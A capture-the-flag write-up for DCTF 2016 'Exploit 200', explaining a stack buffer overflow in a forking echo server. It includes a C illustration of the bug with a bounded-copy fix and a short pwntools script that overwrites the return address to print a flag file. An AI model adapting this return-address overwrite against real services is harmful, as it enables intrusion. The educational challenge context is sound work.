Tags: pwn 

# Exploit 200 - My gift

> Writeup by f0xtr0t (Jay Bosamiya)

@p4n74 (Rakholiya Jenish) and I were working on this challenge. Was quite a bit of fun, especially since the exploit code I wrote didn't work, and an equivalent code written by p4n74 did :P Still trying to figure out why :D

The [given file](exp200.bin) is a 64-bit ELF executable. Opening it up in IDA Pro, we realize that it is a standard forking server listening on port `1337`. When a client connects, it is a simple echo service: any string sent is `recv`d and then `puts`d back. The output goes to the socket through a `dup2`-based file-descriptor redirect.

The vulnerability is that the `recv`d string is stored in a stack-based buffer, and the `recv` is allowed to write more than the buffer size, so the overflow reaches the saved EBP and saved EIP (the saved RBP and return address on this 64-bit binary). There is no stack canary either (though if there were one, leaking it via the `puts` echo would be easy enough).

We want to overwrite the saved EIP with `0x400B90` (which, wonder of wonders, IDA doesn't detect as a function, but which is the one that opens a `gift` file and outputs it).

After achieving the overwrite, we need to exit out of the function so that the return happens. This should be easy, since the code checks the received string for the letters `'s'`, `'t'`, `'o'`, and `'p'` to decide when to stop. This is where we wasted a lot of time. Turns out, it checks these at positions 0, 1, 2, and **4**; but we were assuming it checks at 0, 1, 2, and **3**. The moment we send `stoap`, it breaks out of the function, returning to our overwritten EIP.
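As an added illustration (not the challenge's code, which we only saw in IDA), here is the shape of the bug and of its fix in C, with the stop check reconstructed from the description above. `BUF_SIZE`, `RECV_MAX` and the function names are assumptions; the writeup only tells us that `0x68` bytes of padding reach the saved return address.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not code from the challenge binary. The buffer size and the
 * recv() length are assumptions; the writeup only states that 0x68 bytes of
 * padding reach the saved return address. */
#define BUF_SIZE 0x60
#define RECV_MAX 0x200

/* Vulnerable shape described in the writeup (not executed here):
 *     char buf[BUF_SIZE];
 *     recv(fd, buf, RECV_MAX, 0);   // bound is larger than the buffer
 * Anything past BUF_SIZE bytes overwrites the saved frame pointer and then
 * the saved return address, with no canary in between. */

/* The stop check as the writeup describes it: 's', 't', 'o' and 'p' are
 * tested at offsets 0, 1, 2 and 4, so "stoap" matches while "stop" does not. */
int is_stop_command(const char *msg, size_t len)
{
    if (len < 5)
        return 0;
    return msg[0] == 's' && msg[1] == 't' && msg[2] == 'o' && msg[4] == 'p';
}

/* Hardened copy: bounded by the destination size, always NUL-terminated.
 * Returns the number of payload bytes actually stored. */
size_t store_message(char *dst, size_t dst_size, const char *msg, size_t len)
{
    size_t n = len < dst_size - 1 ? len : dst_size - 1;
    memcpy(dst, msg, n);
    dst[n] = '\0';
    return n;
}

/* Feeds a constructed message of msg_len 'A' bytes through the hardened copy
 * and reports how many were kept: a 0x70-byte message, which would reach the
 * return address in the vulnerable version, is cut at BUF_SIZE - 1. */
size_t stored_length_for(size_t msg_len)
{
    char msg[RECV_MAX];
    char buf[BUF_SIZE];
    if (msg_len > sizeof msg)
        msg_len = sizeof msg;
    memset(msg, 'A', msg_len);
    return store_message(buf, sizeof buf, msg, msg_len);
}
```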

Now, it was only a matter of coding it up.

[Pwntools](http://pwntools.readthedocs.io/) makes life very easy for this, and it was only a matter of writing the following script, which breaks in and gets the flag :)

```python
from pwn import *

# 0x68 bytes of padding cover the stack buffer and the saved RBP;
# the next 8 bytes land on the saved return address.
payload = b"A" * 0x68
payload += p64(0x400B90)    # the unnamed function that opens and prints the gift file

conn = remote("10.13.37.22", 1337)
conn.send(payload)          # overflow the buffer; the service echoes it back
conn.recv()
conn.sendline(b"stoap")     # 's','t','o' at 0,1,2 and 'p' at 4 break out of the loop
conn.recv()
print(conn.recv().rstrip()) # the contents of the gift file
conn.close()
```

Original writeup (https://github.com/InfoSecIITR/write-ups/tree/master/2016/dctf-quals-2016/exploit/200).